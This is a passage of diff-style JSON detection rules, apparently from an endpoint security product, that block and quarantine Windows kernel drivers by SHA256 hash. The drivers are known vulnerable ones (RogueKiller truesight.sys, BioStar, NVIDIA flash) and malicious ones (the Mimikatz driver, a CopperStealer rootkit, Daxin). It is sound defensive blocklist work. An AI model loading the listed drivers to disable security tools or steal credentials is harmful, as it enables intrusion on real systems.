"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492448Z", + "creation_date": "2026-03-23T11:45:31.492450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "400c4daae47f29a340154e2e5ebcacce436f0f00067fcb528c9acbe281f5d8ec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e3473bf-5c8d-5b96-a585-532d5b7629fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161146Z", + "creation_date": "2026-03-23T11:45:31.161148Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161154Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f268e679640e2be2c2f10153fe2bb866a76e63ec7237552377e00121579f3a16", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e624e7f-4d71-5e73-9375-725614d45442", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977243Z", + "creation_date": 
"2026-03-23T11:45:29.977245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977250Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1cb86386757b947b39086cc8639da988f6e8018ca9995dd669bdc03c8d39d7d", + "comment": "Malicious CopperStealer Rootkit (aka windbg.sys) [https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e677db8-0185-54be-a208-ae0924a05730", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147466Z", + "creation_date": "2026-03-23T11:45:31.147468Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147473Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39387167827471754b84cb209e9bd06b268173b53d64f8106a2fdf8ae872df42", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"2e712d09-5b84-5a6a-9432-bf2cf89a0927", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807539Z", + "creation_date": "2026-03-23T11:45:31.807541Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a688ece8c13c9250de44f982cbcbe8ed7460aa4173cfd51a1f8ce0490ead33f7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e8096a7-8140-5188-b445-4c000ad2a6f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478015Z", + "creation_date": "2026-03-23T11:45:30.478019Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.478028Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72876e44135f9b49932b547129e32acf9ce3df98a3f9c5c31355160f6d06ca3c", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e8d0e7b-d6b8-5ff2-b194-0f79157c2275", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150513Z", + "creation_date": "2026-03-23T11:45:31.150515Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150520Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca151932a897c90240b0d5ed97b3e5f655b7383091b3d66bd54123ce3f7520bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ea6abff-85b6-51b6-a3ea-e727903b045c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146854Z", + "creation_date": "2026-03-23T11:45:32.146856Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146862Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "174c8d771d31d70fc95448e961a395f5ceb7658f0cc381a718fb3b854cde4efe", + "comment": "Vulnerable Kernel Driver (aka BioNTdrv.sys) [https://www.loldrivers.io/drivers/e6378671-986d-42a1-8e7a-717117c83751/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ea92f52-ebc0-5178-a2ed-d2f401544dd7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832461Z", + "creation_date": "2026-03-23T11:45:30.832463Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832469Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"f5376806f970b67dc5e8c5a74600cfa69c26d668141b353a636c9d8cd919f0f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ebb61ad-e782-5512-8a5a-a2e03b8db716", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613598Z", + "creation_date": "2026-03-23T11:45:29.613599Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613605Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0728184caead84f2e88777d833765f2d8af6a20aad77b426e07e76ef91f5c3f", + "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ec5b4a5-2582-5d0d-8fb2-fee352e0c364", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621229Z", + "creation_date": "2026-03-23T11:45:29.621231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621236Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c4db6ee983fd4fa74f8212031ade343a1b9abdb258d05bef1aabd7ab49fbc16", + "comment": "Logitech CoreTemp vulnerable driver (aka LgCoreTemp.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ed76bf2-8029-5fc5-a53d-1cb252fa25e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481229Z", + "creation_date": "2026-03-23T11:45:31.481233Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481243Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d2310cdc96a3411ee73044a5cc9a5c3672f61f5c496d04d76f6723646cf237f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2edac3ac-7c75-5a70-aadd-bb0783b328ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150907Z", + "creation_date": "2026-03-23T11:45:31.150908Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150914Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17aa5ffb7f675645d0813a1caf6acdcbc4d6bf453a627c7535d01eb93cdd0ecc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ee9f0e7-4dc5-58b5-a040-a23f5b60e768", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145639Z", + 
"creation_date": "2026-03-23T11:45:32.145641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145647Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "92f9341304bfb77158d29397d1b9695dee0d001ab5f119a8b49f49fa15e0cd98", + "comment": "Vulnerable Kernel Driver (aka psmounterex.sys) [https://www.loldrivers.io/drivers/0f64bf7a-2ef2-45ea-af7d-4e7c87d98777/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2efdd326-d568-5627-a05b-b369780b52c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463127Z", + "creation_date": "2026-03-23T11:45:30.463130Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463139Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7aa8abdda8a68b8418e86bef50c19ef2f34bc66e7b139e43c2a99ab48c933be", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2efe7a04-6110-5ee0-841b-cd2a20808162", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617931Z", + "creation_date": "2026-03-23T11:45:29.617933Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617938Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e9ec6b3e83055ae90f3664a083c46885c506d33de5e2a49f5f1189e89fa9f0a", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f0414de-38a4-526f-8074-2b55193e2324", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140492Z", + "creation_date": "2026-03-23T11:45:31.140494Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.140500Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "455f3eb28887f0b6d55c66f8607ee771f6103a39d8cb3af3dd1cc5f4e1266293", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f0bcb26-7b00-5f8c-a586-4ac4afc478b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984888Z", + "creation_date": "2026-03-23T11:45:29.984890Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5", + "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f17ce4f-1338-5ae9-bd08-63d200e0e42e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604609Z", + "creation_date": "2026-03-23T11:45:29.604610Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604616Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376", + "comment": "Malicious Kernel Driver (aka daxin_blank3.sys) [https://www.loldrivers.io/drivers/9748d5c8-62dd-474b-a336-0aadb49e5ff9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f2372d9-1dcd-5869-823b-448810e78f02", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155823Z", + "creation_date": "2026-03-23T11:45:31.155825Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155830Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9f1c346fc6680ca2826dd85307c200ff199a83fa1f03b28cd14792007e39534", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f2c126e-7fd7-5b05-af91-2ca69a1f26ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622263Z", + "creation_date": "2026-03-23T11:45:29.622265Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622270Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "545190e8b2a910e153b12559a9875154a1b40d6424cb4a6299a84b2dc99df700", + "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f2d992b-5616-51ac-a879-7e1b61b03880", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.149618Z", + "creation_date": "2026-03-23T11:45:31.149621Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4af5d4cb95c32b9f8041a448c3766b658f4d6918f259fa75f1d0c92c711e9528", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f2fa31b-9e29-51ba-985f-c83f5a170f16", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971042Z", + "creation_date": "2026-03-23T11:45:29.971045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0867af893422b7191e77907de58faf787d4763cc7e9a2a3a91c72f1995a9c3f3", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"2f371a08-0c0e-54be-9a47-c17c6dea0da5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818136Z", + "creation_date": "2026-03-23T11:45:30.818138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1e4455499c6a90ba9a861120a015a6b6f17e64479462b869ad0f05edf6552de", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f4a6408-4fdd-5225-8de4-b1928710e84c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832730Z", + "creation_date": "2026-03-23T11:45:30.832732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
